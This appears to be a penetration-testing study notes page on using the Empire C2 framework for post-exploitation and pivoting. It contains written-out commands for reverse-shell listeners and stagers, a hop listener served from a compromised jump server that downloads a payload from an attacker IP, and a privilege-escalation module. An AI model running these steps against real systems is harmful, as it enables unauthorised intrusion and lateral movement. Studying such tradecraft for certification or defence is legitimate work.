// notes/ Pivoting & Tunneling
🚀
C2
There are many different [C2](https://howto.thec2matrix.com/) frameworks. They can be hosted in the cloud for collaborative red teams
#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/c2 ↗C2
There are many different C2 frameworks. They can be hosted in the cloud for collaborative red teams
Empire
Empire components:
- Listeners are well... listeners. They listen for a connection and facilitate further exploitation
- Stagers are essentially payloads generated by Empire to create a robust reverse shell in conjunction with a listener. They are the delivery mechanism for agents
- Agents are the equivalent of a Metasploit "Session". They are connections to compromised targets, and allow an attacker to further interact with the system
- Modules are used to in conjunction with agents to perform further exploitation. For example, they can work through an existing agent to dump the password hashes from the server
Listeners
bash
$uselistener http$set Name CLIHTTP$set Host 10.10.14.8$set Port 8000$execute$listeners{% hint style="info" %}
Stop a listener using kill CLIHTTP
{% endhint %}
Stagers
Stagers are essentially Empire's payloads used to connect back to the C2 server and create an agent.
Linux Machines
code
01usestager multi/bash02set Listener CLIHTTP03executeAgents
Upload and run payload on target machine and check
code
01agents02interact [ID]03helpHop Listeners
Hop listeners create files to be copied across to the compromised "jump" server and served from there. The files contain instructions to connect back to our C2 listener
code
01uselistener http_hop02set RedirectListener CLIHTTP03set Host 10.200.101.200 <--- compromised webserver IP04set port 47000 <--- above 15000Hop Listener Stager
code
01usestager multi/launcher02set Listener http_hop03executeJump server (compromised webserver) setup
On Attacker machine
code
01cd /tmp/http_hop02sudo zip -r hop.zip *03python3 -m http.server 80On jumpserver
code
01mkdir /tmp/hop-adot8 && cd /tmp/hop-adot802curl http://10.50.102.164/hop.zip -o hop.zip03unzip hop.zip04php -S 0.0.0.0:47000 & <-- Serves on php payloads (php must be installed)05firewall-cmd --zone=public --add-port 47000/tcpExecute Payload on internal target
Modules
PowerUp Invoke-AllChecks example
code
01usemodule powershell_privesc_powerup_allchecks02set Agent [ID]03execute04agents05intereact [ID]